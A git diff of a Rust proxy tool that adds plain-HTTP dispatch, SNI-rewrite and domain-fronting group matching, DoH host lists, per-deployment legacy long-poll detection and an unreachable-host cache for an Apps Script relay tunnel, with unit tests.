+ } + }; + + tracing::info!( + "dispatch http {}:{} -> raw-tcp ({}) (direct mode: no relay)", + host, + port, + rewrite_ctx.upstream_socks5.as_deref().unwrap_or("direct"), + ); + + // Rewrite request line to origin form and drop hop-by-hop headers. + let mut rewritten = Vec::with_capacity(head.len()); + rewritten.extend_from_slice(method.as_bytes()); + rewritten.push(b' '); + rewritten.extend_from_slice(path.as_bytes()); + rewritten.push(b' '); + rewritten.extend_from_slice(version.as_bytes()); + rewritten.extend_from_slice(b"\r\n"); + for (k, v) in &headers { + let kl = k.to_ascii_lowercase(); + if kl == "proxy-connection" || kl == "connection" || kl == "keep-alive" { + continue; + } + rewritten.extend_from_slice(k.as_bytes()); + rewritten.extend_from_slice(b": "); + rewritten.extend_from_slice(v.as_bytes()); + rewritten.extend_from_slice(b"\r\n"); + } + rewritten.extend_from_slice(b"Connection: close\r\n\r\n"); + + let target_host = host.trim_start_matches('[').trim_end_matches(']'); + let connect_timeout = if looks_like_ip(target_host) { + std::time::Duration::from_secs(4) + } else { + std::time::Duration::from_secs(10) + }; + let upstream = if let Some(proxy) = rewrite_ctx.upstream_socks5.as_deref() { + match socks5_connect_via(proxy, target_host, port).await { + Ok(s) => s, + Err(e) => { + tracing::warn!( + "upstream-socks5 {} -> {}:{} failed: {} (falling back to direct)", + proxy, + host, + port, + e + ); + match tokio::time::timeout( + connect_timeout, + TcpStream::connect((target_host, port)), + ) + .await + { + Ok(Ok(s)) => s, + _ => return Ok(()), + } + } + } + } else { + match tokio::time::timeout(connect_timeout, TcpStream::connect((target_host, port))).await { + Ok(Ok(s)) => s, + Ok(Err(e)) => { + tracing::debug!("plain-http connect {}:{} failed: {}", host, port, e); + return Ok(()); + } + Err(_) => { + tracing::debug!("plain-http connect {}:{} timeout", host, port); + return Ok(()); + } + } + }; + let _ = upstream.set_nodelay(true); + + let (mut ar, mut aw) = sock.split(); + let (mut br, mut bw) = upstream.into_split(); + bw.write_all(&rewritten).await?; + if !leftover.is_empty() { + bw.write_all(leftover).await?; + } + let t1 = tokio::io::copy(&mut ar, &mut bw); + let t2 = tokio::io::copy(&mut br, &mut aw); + tokio::select! { + _ = t1 => {} + _ = t2 => {} + } + Ok(()) +} + +/// Parse the target of a plain-HTTP proxy request line into +/// `(host, port, origin-form-path)`. Browsers send absolute form +/// (`http://host[:port]/path`); we also accept the origin-form +/// fallback (`/path` with a `Host:` header) for transparent-proxy +/// clients. `https://` is accepted defensively, though browsers route +/// HTTPS through CONNECT and shouldn't hit this path. +fn resolve_plain_http_target( + target: &str, + headers: &[(String, String)], +) -> Option<(String, u16, String)> { + let (rest, default_port) = if let Some(r) = target.strip_prefix("http://") { + (r, 80u16) + } else if let Some(r) = target.strip_prefix("https://") { + (r, 443u16) + } else if target.starts_with('/') { + let host_header = headers + .iter() + .find(|(k, _)| k.eq_ignore_ascii_case("host")) + .map(|(_, v)| v.as_str())?; + let (host, port) = split_authority(host_header, 80); + return Some((host, port, target.to_string())); + } else { + return None; + }; + + let (authority, path) = match rest.find('/') { + Some(i) => (&rest[..i], &rest[i..]), + None => (rest, "/"), + }; + if authority.is_empty() { + return None; + } + let (host, port) = split_authority(authority, default_port); + Some((host, port, path.to_string())) +} + +/// Split an `authority` (`host[:port]`, with optional IPv6 brackets) +/// into a `(host, port)` pair, defaulting the port when absent. +fn split_authority(authority: &str, default_port: u16) -> (String, u16) { + // Bare IPv6 (multiple colons, no brackets) — `rsplit_once(':')` + // would otherwise mangle `::1` into `(":", 1)`. Take the whole + // string as the host and use the default port. + let colons = authority.bytes().filter(|&b| b == b':').count(); + if colons > 1 && !authority.starts_with('[') { + return (authority.to_string(), default_port); + } + if let Some((h, p)) = authority.rsplit_once(':') { + if let Ok(port) = p.parse::() { + return (h.to_string(), port); + } + } + (authority.to_string(), default_port) +} + #[cfg(test)] mod tests { use super::*; @@ -2215,6 +2882,63 @@ mod tests { .collect() } + #[test] + fn resolve_plain_http_target_parses_absolute_form() { + let h = headers(&[]); + let (host, port, path) = + resolve_plain_http_target("http://example.com/", &h).unwrap(); + assert_eq!(host, "example.com"); + assert_eq!(port, 80); + assert_eq!(path, "/"); + + let (host, port, path) = + resolve_plain_http_target("http://example.com:8080/foo?x=1", &h).unwrap(); + assert_eq!(host, "example.com"); + assert_eq!(port, 8080); + assert_eq!(path, "/foo?x=1"); + + let (host, port, path) = + resolve_plain_http_target("http://example.com", &h).unwrap(); + assert_eq!(host, "example.com"); + assert_eq!(port, 80); + assert_eq!(path, "/"); + } + + #[test] + fn resolve_plain_http_target_falls_back_to_host_header() { + let h = headers(&[("Host", "example.com:8080")]); + let (host, port, path) = resolve_plain_http_target("/foo", &h).unwrap(); + assert_eq!(host, "example.com"); + assert_eq!(port, 8080); + assert_eq!(path, "/foo"); + } + + #[test] + fn resolve_plain_http_target_rejects_bare_authority() { + // No scheme, doesn't start with `/` — not something we can route. + assert!(resolve_plain_http_target("example.com", &headers(&[])).is_none()); + assert!(resolve_plain_http_target("http://", &headers(&[])).is_none()); + } + + #[test] + fn split_authority_handles_ports_and_ipv6() { + assert_eq!( + split_authority("example.com", 80), + ("example.com".to_string(), 80) + ); + assert_eq!( + split_authority("example.com:8080", 80), + ("example.com".to_string(), 8080) + ); + assert_eq!( + split_authority("[::1]:8080", 80), + ("[::1]".to_string(), 8080) + ); + // Bare IPv6 without brackets — keep the whole string as the host + // and use the default port instead of mis-splitting on a colon. + assert_eq!(split_authority("::1", 80), ("::1".to_string(), 80)); + } + #[test] fn socks5_udp_domain_packet_round_trips() { let mut raw = vec![0, 0, 0, 0x03, 11]; @@ -2366,36 +3090,77 @@ mod tests { #[test] fn youtube_via_relay_routes_youtube_through_relay_path() { - // Issue #102. When youtube_via_relay=true, YouTube suffixes - // must NOT match the SNI-rewrite path, so traffic falls - // through to Apps Script relay. Other Google suffixes are - // unaffected. + // Issue #102 + #275. When youtube_via_relay=true: + // - YouTube API + HTML hosts (where Restricted Mode lives) + // opt out of SNI rewrite so they go through the relay. + // - YouTube image / video / channel-asset CDNs STAY on SNI + // rewrite — Restricted Mode isn't enforced on those, and + // routing video chunks through Apps Script burns quota + // and risks the 6-min execution cap. Pre-#275 ytimg.com + // was incorrectly carved out alongside the API surfaces. + // - Non-YouTube Google suffixes are unaffected by the flag. let hosts = std::collections::HashMap::new(); - // Default behaviour: everything in the pool rewrites. + // Default behaviour (flag off): everything in the SNI pool + // rewrites including all YouTube assets. + assert!(should_use_sni_rewrite(&hosts, "www.youtube.com", 443, false)); + assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, false)); + assert!(should_use_sni_rewrite(&hosts, "youtu.be", 443, false)); + assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, false)); assert!(should_use_sni_rewrite( &hosts, - "www.youtube.com", + "youtubei.googleapis.com", 443, false )); - assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, false)); - assert!(should_use_sni_rewrite(&hosts, "youtu.be", 443, false)); - assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, false)); - // With the toggle on: YouTube opts out, Google stays. + // googlevideo.com is INTENTIONALLY NOT in SNI_REWRITE_SUFFIXES + // — see the long note at the top of the SNI list. v1.7.4 tried + // adding it; reverted in v1.7.6 after user reports of total + // YouTube breakage. If the project ever ships an EVA-edge-IP + // config knob, this assertion can flip. Until then, video + // chunks correctly fall through to the Apps Script relay path + // and this assertion guards against a regression. assert!(!should_use_sni_rewrite( &hosts, - "www.youtube.com", + "rr1---sn-abc.googlevideo.com", 443, - true + false )); - assert!(!should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, true)); + + // Flag on: only the API + HTML hosts opt out. + assert!(!should_use_sni_rewrite(&hosts, "www.youtube.com", 443, true)); assert!(!should_use_sni_rewrite(&hosts, "youtu.be", 443, true)); + assert!(!should_use_sni_rewrite( + &hosts, + "www.youtube-nocookie.com", + 443, + true + )); + assert!(!should_use_sni_rewrite( + &hosts, + "youtubei.googleapis.com", + 443, + true + )); + + // Flag on: image / channel-asset CDNs STAY on SNI rewrite. Pre-#275 + // ytimg.com was incorrectly carved out alongside the API surfaces. + // googlevideo.com still goes through the relay path (not in the + // SNI list at all — see note above the SNI_REWRITE_SUFFIXES + // entries) so the same flag-on assertion isn't applicable to it. + assert!(should_use_sni_rewrite(&hosts, "i.ytimg.com", 443, true)); + assert!(should_use_sni_rewrite(&hosts, "yt3.ggpht.com", 443, true)); + + // Flag on: non-YouTube Google suffixes are unaffected. Note + // youtubei.googleapis.com (above) is the *carve-out* — the + // broader googleapis.com suffix is NOT carved out, so e.g. + // Drive / Calendar / etc. continue to SNI-rewrite. assert!(should_use_sni_rewrite(&hosts, "www.google.com", 443, true)); + assert!(should_use_sni_rewrite(&hosts, "fonts.gstatic.com", 443, true)); assert!(should_use_sni_rewrite( &hosts, - "fonts.gstatic.com", + "drive.googleapis.com", 443, true )); @@ -2459,4 +3224,152 @@ mod tests { assert!(matches_passthrough("example.com", &list)); assert!(matches_passthrough("example.com.", &list)); } + + #[test] + fn doh_default_list_exact_matches() { + let extra: Vec = vec![]; + assert!(matches_doh_host("chrome.cloudflare-dns.com", &extra)); + assert!(matches_doh_host("dns.google", &extra)); + assert!(matches_doh_host("dns.quad9.net", &extra)); + assert!(matches_doh_host("doh.opendns.com", &extra)); + } + + #[test] + fn doh_default_list_case_insensitive_and_trailing_dot() { + let extra: Vec = vec![]; + assert!(matches_doh_host("DNS.GOOGLE", &extra)); + assert!(matches_doh_host("dns.google.", &extra)); + } + + #[test] + fn doh_default_list_suffix_match_for_tenant_subdomains() { + // `cloudflare-dns.com` is in the default list — Workers-hosted + // tenant DoH endpoints sit under it and should match too. + let extra: Vec = vec![]; + assert!(matches_doh_host("tenant.cloudflare-dns.com", &extra)); + // But a substring match must NOT pass: `xcloudflare-dns.com` is + // a different domain. + assert!(!matches_doh_host("xcloudflare-dns.com", &extra)); + } + + #[test] + fn doh_default_list_unrelated_hosts_do_not_match() { + let extra: Vec = vec![]; + assert!(!matches_doh_host("example.com", &extra)); + assert!(!matches_doh_host("googlevideo.com", &extra)); + assert!(!matches_doh_host("", &extra)); + } + + #[test] + fn doh_extra_list_extends_default() { + let extra = vec![".internal-doh.example".to_string(), "doh.acme.test".to_string()]; + // Defaults still match. + assert!(matches_doh_host("dns.google", &extra)); + // User additions match. + assert!(matches_doh_host("doh.acme.test", &extra)); + assert!(matches_doh_host("a.b.internal-doh.example", &extra)); + // Unrelated still doesn't match. + assert!(!matches_doh_host("example.com", &extra)); + } + + #[test] + fn doh_extra_entries_match_subdomains_without_leading_dot() { + // Asymmetry footgun guard: user adds `doh.acme.test` and expects + // `tenant.doh.acme.test` to match too — same as `dns.google` + // matching `tenant.dns.google` from the default list. Unlike + // `passthrough_hosts`, DoH extras don't require a leading dot. + let extra = vec!["doh.acme.test".to_string()]; + assert!(matches_doh_host("doh.acme.test", &extra)); + assert!(matches_doh_host("tenant.doh.acme.test", &extra)); + // But substring overlap must still be rejected. + assert!(!matches_doh_host("xdoh.acme.test", &extra)); + } + + fn fg(name: &str, sni: &str, domains: &[&str]) -> Arc { + Arc::new( + FrontingGroupResolved::from_config(&FrontingGroup { + name: name.into(), + ip: "127.0.0.1".into(), + sni: sni.into(), + domains: domains.iter().map(|s| s.to_string()).collect(), + }) + .expect("test fronting group should resolve"), + ) + } + + #[test] + fn fronting_group_match_exact_and_suffix() { + let groups = vec![fg("vercel", "react.dev", &["vercel.com", "nextjs.org"])]; + // Exact. + assert_eq!( + match_fronting_group("vercel.com", &groups).map(|g| g.name.as_str()), + Some("vercel") + ); + // Suffix. + assert_eq!( + match_fronting_group("app.vercel.com", &groups).map(|g| g.name.as_str()), + Some("vercel") + ); + // Different member. + assert_eq!( + match_fronting_group("docs.nextjs.org", &groups).map(|g| g.name.as_str()), + Some("vercel") + ); + // Non-member. + assert!(match_fronting_group("example.com", &groups).is_none()); + // Substring overlap is NOT a match (xvercel.com isn't *.vercel.com). + assert!(match_fronting_group("xvercel.com", &groups).is_none()); + } + + #[test] + fn fronting_group_match_case_and_trailing_dot() { + let groups = vec![fg("fastly", "www.python.org", &["reddit.com"])]; + assert_eq!( + match_fronting_group("Reddit.COM", &groups).map(|g| g.name.as_str()), + Some("fastly") + ); + assert_eq!( + match_fronting_group("reddit.com.", &groups).map(|g| g.name.as_str()), + Some("fastly") + ); + assert_eq!( + match_fronting_group("WWW.Reddit.com.", &groups).map(|g| g.name.as_str()), + Some("fastly") + ); + } + + #[test] + fn fronting_group_match_first_wins() { + // When a host is in two groups, the earlier group is chosen. + // Lets users put more-specific groups first. + let groups = vec![ + fg("specific", "a.example", &["api.example.com"]), + fg("broad", "b.example", &["example.com"]), + ]; + assert_eq!( + match_fronting_group("api.example.com", &groups).map(|g| g.name.as_str()), + Some("specific") + ); + assert_eq!( + match_fronting_group("example.com", &groups).map(|g| g.name.as_str()), + Some("broad") + ); + } + + #[test] + fn fronting_group_match_empty_list() { + let groups: Vec> = Vec::new(); + assert!(match_fronting_group("vercel.com", &groups).is_none()); + } + + #[test] + fn fronting_group_resolve_rejects_invalid_sni() { + let bad = FrontingGroup { + name: "bad".into(), + ip: "127.0.0.1".into(), + sni: "not a valid hostname".into(), + domains: vec!["x.com".into()], + }; + assert!(FrontingGroupResolved::from_config(&bad).is_err()); + } } diff --git a/src/test_cmd.rs b/src/test_cmd.rs index a9007a8d..b87c7fdd 100644 --- a/src/test_cmd.rs +++ b/src/test_cmd.rs @@ -20,10 +20,10 @@ use crate::domain_fronter::DomainFronter; const TEST_URL: &str = "https://api.ipify.org/?format=json"; pub async fn run(config: &Config) -> bool { - if matches!(config.mode_kind(), Ok(Mode::GoogleOnly)) { + if matches!(config.mode_kind(), Ok(Mode::Direct)) { let msg = "`mhrv-rs test` probes the Apps Script relay, which isn't \ - wired up in google_only mode. Run `mhrv-rs test-sni` to \ - check the direct SNI-rewrite tunnel instead."; + wired up in direct mode. Run `mhrv-rs test-sni` to check \ + the SNI-rewrite tunnel instead."; println!("{}", msg); tracing::error!("{}", msg); return false; @@ -35,7 +35,7 @@ pub async fn run(config: &Config) -> bool { // back as the Apps Script datacenter — confusing because it // disagreed with what whatismyipaddress.com showed in the // browser (which DOES go through the tunnel). Rather than fake - // a passing test, refuse the same way we do for google_only and + // a passing test, refuse the same way we do for direct mode and // tell the user how to actually verify Full mode. let msg = "`mhrv-rs test` is wired only for the apps_script relay \ path. In full mode the data plane is the pipelined \ diff --git a/src/tunnel_client.rs b/src/tunnel_client.rs index 72444e60..c3444a44 100644 --- a/src/tunnel_client.rs +++ b/src/tunnel_client.rs @@ -14,7 +14,7 @@ use std::collections::HashMap; // reason; reuse it here. `AtomicBool` works fine in std on every target. use portable_atomic::AtomicU64; use std::sync::atomic::{AtomicBool, Ordering}; -use std::sync::Arc; +use std::sync::{Arc, Mutex}; use std::time::{Duration, Instant}; use base64::engine::general_purpose::STANDARD as B64; @@ -23,7 +23,7 @@ use tokio::io::{AsyncReadExt, AsyncWrite, AsyncWriteExt}; use tokio::net::TcpStream; use tokio::sync::{mpsc, oneshot, Semaphore}; -use crate::domain_fronter::{BatchOp, DomainFronter, TunnelResponse}; +use crate::domain_fronter::{BatchOp, DomainFronter, FronterError, TunnelResponse}; /// Apps Script allows 30 concurrent executions per account / deployment. const CONCURRENCY_PER_DEPLOYMENT: usize = 30; @@ -38,10 +38,11 @@ const MAX_BATCH_PAYLOAD_BYTES: usize = 4 * 1024 * 1024; /// serializing too many sessions behind a single HTTP round-trip. const MAX_BATCH_OPS: usize = 50; -/// Timeout for a single batch HTTP round-trip. If the tunnel-node or Apps -/// Script takes longer than this, the batch fails and sessions get error -/// replies rather than hanging forever. -const BATCH_TIMEOUT: Duration = Duration::from_secs(30); +// Per-batch HTTP round-trip timeout is now read from +// `DomainFronter::batch_timeout()`, sourced from `Config::request_timeout_secs` +// (#430, masterking32 PR #25). The historical default — 30 s, matching Apps +// Script's typical response cliff — lives in `default_request_timeout_secs` +// in `config.rs`. /// Timeout for a session waiting for its batch reply. If the batch task /// is slow (e.g. one op in the batch has a dead target on the tunnel-node @@ -55,6 +56,12 @@ const REPLY_TIMEOUT: Duration = Duration::from_secs(35); /// connect saves one Apps Script round-trip per new flow. const CLIENT_FIRST_DATA_WAIT: Duration = Duration::from_millis(50); +/// Adaptive coalesce defaults: after each new op arrives, wait another +/// step for more ops. Resets on every arrival, up to max from the first +/// op. Overridable via config `coalesce_step_ms` / `coalesce_max_ms`. +const DEFAULT_COALESCE_STEP_MS: u64 = 40; +const DEFAULT_COALESCE_MAX_MS: u64 = 1000; + /// Structured error code the tunnel-node returns when it doesn't know the /// op (version mismatch). Must match `tunnel-node/src/main.rs`. const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP"; @@ -68,6 +75,28 @@ const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP"; /// floor, so network jitter on either side won't false-trigger. const LEGACY_DETECT_THRESHOLD: Duration = Duration::from_millis(1500); +/// How long a deployment stays in "legacy / no long-poll" mode after the +/// last detection. Must be much longer than `LEGACY_DETECT_THRESHOLD` so a +/// freshly-marked deployment doesn't immediately self-recover, but short +/// enough that a redeployed / recovered tunnel-node gets re-probed without +/// requiring a process restart. 60 s lets one stuck deployment widen its +/// own poll cadence without poisoning the others, and self-resets so an +/// upgraded tunnel-node returns to the long-poll fast path on its own. +const LEGACY_RECOVER_AFTER: Duration = Duration::from_secs(60); + +/// How long to remember a `Network is unreachable` / `No route to host` +/// failure for a given `(host, port)`. While cached, the proxy short-circuits +/// repeat CONNECTs with an immediate "host unreachable" reply instead of +/// burning a 1.5–2s tunnel batch round-trip on a target that just failed. +/// Real motivator: IPv6-only probe hostnames (e.g. `ds6.probe.*`) on devices +/// without IPv6 — the OS retries the probe every ~1.5s for 10s+, generating +/// 5–10 wasted tunnel sessions per probe. +const UNREACHABLE_CACHE_TTL: Duration = Duration::from_secs(30); + +/// Hard cap on negative-cache size. Browsing pulls in dozens of distinct +/// hosts; we don't want a runaway map. Pruned opportunistically on insert. +const UNREACHABLE_CACHE_MAX: usize = 256; + /// Ports where the *server* speaks first (SMTP banner, SSH identification, /// POP3/IMAP greeting, FTP banner). On these, waiting for client bytes /// gains nothing and just adds handshake latency — skip the pre-read. @@ -77,10 +106,44 @@ fn is_server_speaks_first(port: u16) -> bool { matches!(port, 21 | 22 | 25 | 80 | 110 | 143 | 587) } +/// Recognize the tunnel-node's connect-error strings that mean +/// "this destination is fundamentally unreachable from the tunnel-node's +/// network right now" — distinct from refused/reset/timeout, which can be +/// transient. These come through as the inner `e` of a `TunnelResponse` +/// after the tunnel-node's std::io::Error is stringified, so we match on +/// substrings rather than `ErrorKind`. Linux: errno 101 (ENETUNREACH), +/// errno 113 (EHOSTUNREACH). Format varies a bit across libc/Tokio +/// versions, so cover both the human text and the os-error tag. +fn is_unreachable_error_str(s: &str) -> bool { + let lc = s.to_ascii_lowercase(); + lc.contains("network is unreachable") + || lc.contains("no route to host") + || lc.contains("os error 101") + || lc.contains("os error 113") +} + +/// Canonicalize a host string for use as a negative-cache key. DNS names +/// are case-insensitive and may carry a trailing root-label dot, so +/// `Example.COM:443`, `example.com:443`, and `example.com.:443` are all the +/// same destination. IPv4 / IPv6 literals are unaffected — IPv4 has no +/// letters, and `Ipv6Addr::to_string()` already emits lowercase. +fn normalize_cache_host(host: &str) -> String { + let trimmed = host.strip_suffix('.').unwrap_or(host); + trimmed.to_ascii_lowercase() +} + // --------------------------------------------------------------------------- // Multiplexer // --------------------------------------------------------------------------- +/// Reply payload for ops that go through `fire_batch`. The `String` is the +/// `script_id` of the deployment that processed the batch — needed by +/// `tunnel_loop`'s legacy-detection and per-deployment skip-when-idle +/// decisions, which can't reach `fire_batch`'s local `script_id` any +/// other way. Plain `Connect` doesn't go through `fire_batch` and keeps +/// the simpler reply type. +type BatchedReply = oneshot::Sender>; + enum MuxMsg { Connect { host: String, @@ -93,23 +156,23 @@ enum MuxMsg { // Arc so the caller can hand the buffer to the mux AND keep a ref // for the fallback path without an extra 64 KB copy per session. data: Arc>, - reply: oneshot::Sender>, + reply: BatchedReply, }, Data { sid: String, data: Vec, - reply: oneshot::Sender>, + reply: BatchedReply, }, UdpOpen { host: String, port: u16, data: Vec, - reply: oneshot::Sender>, + reply: BatchedReply, }, UdpData { sid: String, data: Vec, - reply: oneshot::Sender>, + reply: BatchedReply, }, Close { sid: String, @@ -122,16 +185,48 @@ pub struct TunnelMux { /// `connect_data` as unsupported. Subsequent sessions skip the /// optimistic path entirely and go straight to plain connect + data. connect_data_unsupported: Arc, - /// Set to `true` after we observe an empty poll round-trip that - /// returned in less than `LEGACY_DETECT_THRESHOLD` with no data. - /// On a long-poll-capable tunnel-node, an empty poll either returns - /// quickly *with data* (push arrived) or holds open until the - /// server's `LONGPOLL_DEADLINE`. A fast empty reply means the server - /// is doing the legacy fixed-sleep drain — in that mode, hammering - /// idle sessions at the new 500 ms cadence wastes Apps Script quota - /// for no benefit, so the loop reverts to the pre-long-poll - /// "skip empty polls when idle" behavior. - server_no_longpoll: Arc, + /// Per-deployment legacy state: `script_id` → time it was last + /// observed serving an empty poll faster than `LEGACY_DETECT_THRESHOLD`. + /// Absence means "long-poll capable, or untested." Entries expire after + /// `LEGACY_RECOVER_AFTER` so a redeployed / recovered tunnel-node + /// rejoins the long-poll fast path without requiring a process restart. + /// + /// Note: the per-deployment marks here do *not* drive a per-deployment + /// poll cadence — the `tunnel_loop` cadence (read-timeout backoff and + /// skip-empty-when-idle) is gated on the aggregate `all_legacy`, + /// because the next op's deployment is chosen later by + /// `next_script_id()` round-robin and the loop can't pre-select. What + /// the per-deployment design *does* fix vs the old single AtomicBool: + /// * one slow / legacy deployment can no longer flip the aggregate + /// true on its own — every deployment has to be marked first; + /// * deployments recover individually on the TTL, so an upgraded + /// tunnel-node lifts the aggregate without needing the others to + /// also recover or the process to restart; + /// * the warn log fires once per (deployment, recovery cycle), so + /// re-detection after recovery is a real signal in the logs. + /// The cost: legacy deployments still receive fast empty polls in + /// mixed mode (round-robin doesn't know to avoid them). Worth it to + /// keep pushed bytes flowing through the long-poll-capable peers. + legacy_deployments: Mutex>, + /// Lock-free hot-path snapshot of "every known deployment is currently + /// in legacy mode." Recomputed under `legacy_deployments`'s mutex on + /// every mark/expire and read with a relaxed load from `tunnel_loop`. + /// True only when this process has fast-empty observations for *all* + /// `num_scripts` deployments simultaneously — that's when the per- + /// session 30 s read-timeout backoff (the only setting where there is + /// no per-deployment alternative) is still appropriate. Invariant: the + /// atomic is always written *after* the map insert, under the same + /// lock, so any reader that sees `true` was preceded by a complete + /// map update. + all_legacy: Arc, + /// Count of *unique* configured deployment IDs at start time. + /// Snapshotted from `fronter.script_id_list()` deduped, since the + /// aggregate gate compares this against `legacy_deployments.len()` + /// (a HashMap, so unique-keyed) — using the raw configured count + /// would make the gate unreachable whenever a user lists the same + /// script_id twice. Blacklisted-but-configured deployments still + /// count here; see `all_servers_legacy` for why. + num_scripts: usize, /// Pre-read observability. Lets an operator see whether the 50 ms /// wait-for-first-bytes is pulling its weight: /// * `preread_win` — client sent bytes in time, bundled with connect @@ -149,28 +244,57 @@ pub struct TunnelMux { /// Separate monotonic counter used only to trigger the summary log /// (avoids a race where two threads both see `total % 100 == 0`). preread_total_events: AtomicU64, + /// Short-lived negative cache for targets the tunnel-node reported as + /// unreachable (`Network is unreachable` / `No route to host`). Keyed by + /// `(host, port)`, value is the expiry instant. Plain Mutex is + /// fine: it's touched once per CONNECT (cheap) and once per failure. + unreachable_cache: Mutex>, } impl TunnelMux { - pub fn start(fronter: Arc) -> Arc { - let n = fronter.num_scripts(); + pub fn start(fronter: Arc, coalesce_step_ms: u64, coalesce_max_ms: u64) -> Arc { + // Dedupe before snapshotting: the aggregate `all_legacy` gate + // compares `legacy_deployments.len()` (a HashMap, so unique + // keys) against this count, so using the raw `num_scripts()` + // would make the gate unreachable whenever a user lists the + // same script_id twice in config. + let unique: std::collections::HashSet<&str> = fronter + .script_id_list() + .iter() + .map(String::as_str) + .collect(); + let unique_n = unique.len(); + let raw_n = fronter.num_scripts(); + if unique_n != raw_n { + tracing::warn!( + "tunnel mux: {} deployments configured but only {} unique script_id(s) — duplicate entries ignored for legacy detection", + raw_n, + unique_n, + ); + } tracing::info!( "tunnel mux: {} deployment(s), {} concurrent per deployment", - n, + unique_n, CONCURRENCY_PER_DEPLOYMENT ); + let step = if coalesce_step_ms > 0 { coalesce_step_ms } else { DEFAULT_COALESCE_STEP_MS }; + let max = if coalesce_max_ms > 0 { coalesce_max_ms } else { DEFAULT_COALESCE_MAX_MS }; + tracing::info!("batch coalesce: step={}ms max={}ms", step, max); let (tx, rx) = mpsc::channel(512); - tokio::spawn(mux_loop(rx, fronter)); + tokio::spawn(mux_loop(rx, fronter, step, max)); Arc::new(Self { tx, connect_data_unsupported: Arc::new(AtomicBool::new(false)), - server_no_longpoll: Arc::new(AtomicBool::new(false)), + legacy_deployments: Mutex::new(HashMap::new()), + all_legacy: Arc::new(AtomicBool::new(false)), + num_scripts: unique_n, preread_win: AtomicU64::new(0), preread_loss: AtomicU64::new(0), preread_skip_port: AtomicU64::new(0), preread_skip_unsupported: AtomicU64::new(0), preread_win_total_us: AtomicU64::new(0), preread_total_events: AtomicU64::new(0), + unreachable_cache: Mutex::new(HashMap::new()), }) } @@ -193,7 +317,8 @@ impl TunnelMux { }) .await; match reply_rx.await { - Ok(r) => r, + Ok(Ok((resp, _script_id))) => Ok(resp), + Ok(Err(e)) => Err(e), Err(_) => Err("mux channel closed".into()), } } @@ -207,7 +332,8 @@ impl TunnelMux { }) .await; match reply_rx.await { - Ok(r) => r, + Ok(Ok((resp, _script_id))) => Ok(resp), + Ok(Err(e)) => Err(e), Err(_) => Err("mux channel closed".into()), } } @@ -231,19 +357,147 @@ impl TunnelMux { } } - fn server_no_longpoll(&self) -> bool { - self.server_no_longpoll.load(Ordering::Relaxed) + /// True only when *every* known deployment is currently in legacy + /// mode. Both per-session decisions in `tunnel_loop` (the 30 s + /// read-timeout backoff and the skip-empty-when-idle short-circuit) + /// gate on this aggregate — they can't pick a per-deployment answer + /// ahead of time because the next op's deployment is chosen by + /// `next_script_id()` only when the batch fires. With one + /// long-poll-capable peer still around, the loop must keep emitting + /// empty polls so round-robin lands some on that peer (where the + /// server can hold them open and deliver pushed bytes). + /// + /// Known limitation: the comparison is against *all configured* + /// deployments (`num_scripts`), not currently-selectable ones. A + /// fleet where most deployments are blacklisted in `DomainFronter` + /// (10 min cooldown) and the only selectable deployment(s) are + /// legacy will keep the fast cadence for up to that cooldown, even + /// though every reachable peer is legacy. Accepted because + /// integrating the blacklist would require a hot-path query on the + /// fronter's mutex once per `tunnel_loop` iteration; a heavily- + /// blacklisted fleet has bigger problems than quota optimization, + /// and the worst-case quota cost is bounded by the cooldown. + /// + /// Hot path: lock-free relaxed load. If the cached value is `true`, + /// double-check under the mutex with a sweep for expired entries — + /// otherwise stale legacy marks would keep us in the slow path forever + /// after every deployment recovers (the `mark_server_no_longpoll` sweep + /// only fires on the next mark, which may never come). + fn all_servers_legacy(&self) -> bool { + if !self.all_legacy.load(Ordering::Relaxed) { + return false; + } + let now = Instant::now(); + let mut deps = match self.legacy_deployments.lock() { + Ok(g) => g, + Err(p) => p.into_inner(), + }; + deps.retain(|_, marked_at| now.duration_since(*marked_at) < LEGACY_RECOVER_AFTER); + let still_all = deps.len() == self.num_scripts; + if !still_all { + self.all_legacy.store(false, Ordering::Relaxed); + } + still_all } - fn mark_server_no_longpoll(&self) { - if !self.server_no_longpoll.swap(true, Ordering::Relaxed) { + fn mark_server_no_longpoll(&self, script_id: &str) { + let now = Instant::now(); + let mut deps = match self.legacy_deployments.lock() { + Ok(g) => g, + Err(p) => p.into_inner(), + }; + // Inline expiry sweep: if any entry has aged past + // LEGACY_RECOVER_AFTER, drop it before recomputing `all_legacy`. + // Without this, an entry that should have recovered would still + // count toward the aggregate. + deps.retain(|_, marked_at| now.duration_since(*marked_at) < LEGACY_RECOVER_AFTER); + let was_present = deps.contains_key(script_id); + deps.insert(script_id.to_string(), now); + let all = deps.len() == self.num_scripts; + // Atomic written under the lock and *after* the map insert. Any + // reader that observes `all_legacy = true` has seen a complete + // map state where every deployment is marked. + self.all_legacy.store(all, Ordering::Relaxed); + drop(deps); + // Only log on first-mark-for-this-cycle: after `LEGACY_RECOVER_AFTER` + // expiry + re-detection we re-log, which is intentional — that's + // a real signal that the deployment regressed back to legacy mode. + if !was_present { + let short = &script_id[..script_id.len().min(8)]; tracing::warn!( - "tunnel-node returned an empty poll faster than {:?}; assuming legacy (no long-poll) drain — falling back to skip-empty-when-idle to avoid quota waste", + "tunnel-node deployment {}... returned an empty poll faster than {:?}; assuming legacy (no long-poll) drain — this deployment will skip empty polls when idle for the next {:?}", + short, LEGACY_DETECT_THRESHOLD, + LEGACY_RECOVER_AFTER, ); } } + /// Returns true if `(host, port)` has a non-expired unreachable entry. + /// The proxy front-end uses this to skip the tunnel and reply + /// "host unreachable" immediately on follow-up CONNECTs. + pub fn is_unreachable(&self, host: &str, port: u16) -> bool { + let now = Instant::now(); + let mut cache = match self.unreachable_cache.lock() { + Ok(g) => g, + Err(p) => p.into_inner(), + }; + let key = (normalize_cache_host(host), port); + match cache.get(&key) { + Some(expiry) if *expiry > now => true, + Some(_) => { + cache.remove(&key); + false + } + None => false, + } + } + + /// If `err` looks like a network-unreachable / no-route-to-host error + /// from the tunnel-node, remember the target for `UNREACHABLE_CACHE_TTL`. + /// No-op for any other error (timeouts, refused, EOF, etc.) — those can + /// be transient and we don't want to lock out a host on a flaky moment. + fn record_unreachable_if_match(&self, host: &str, port: u16, err: &str) { + if !is_unreachable_error_str(err) { 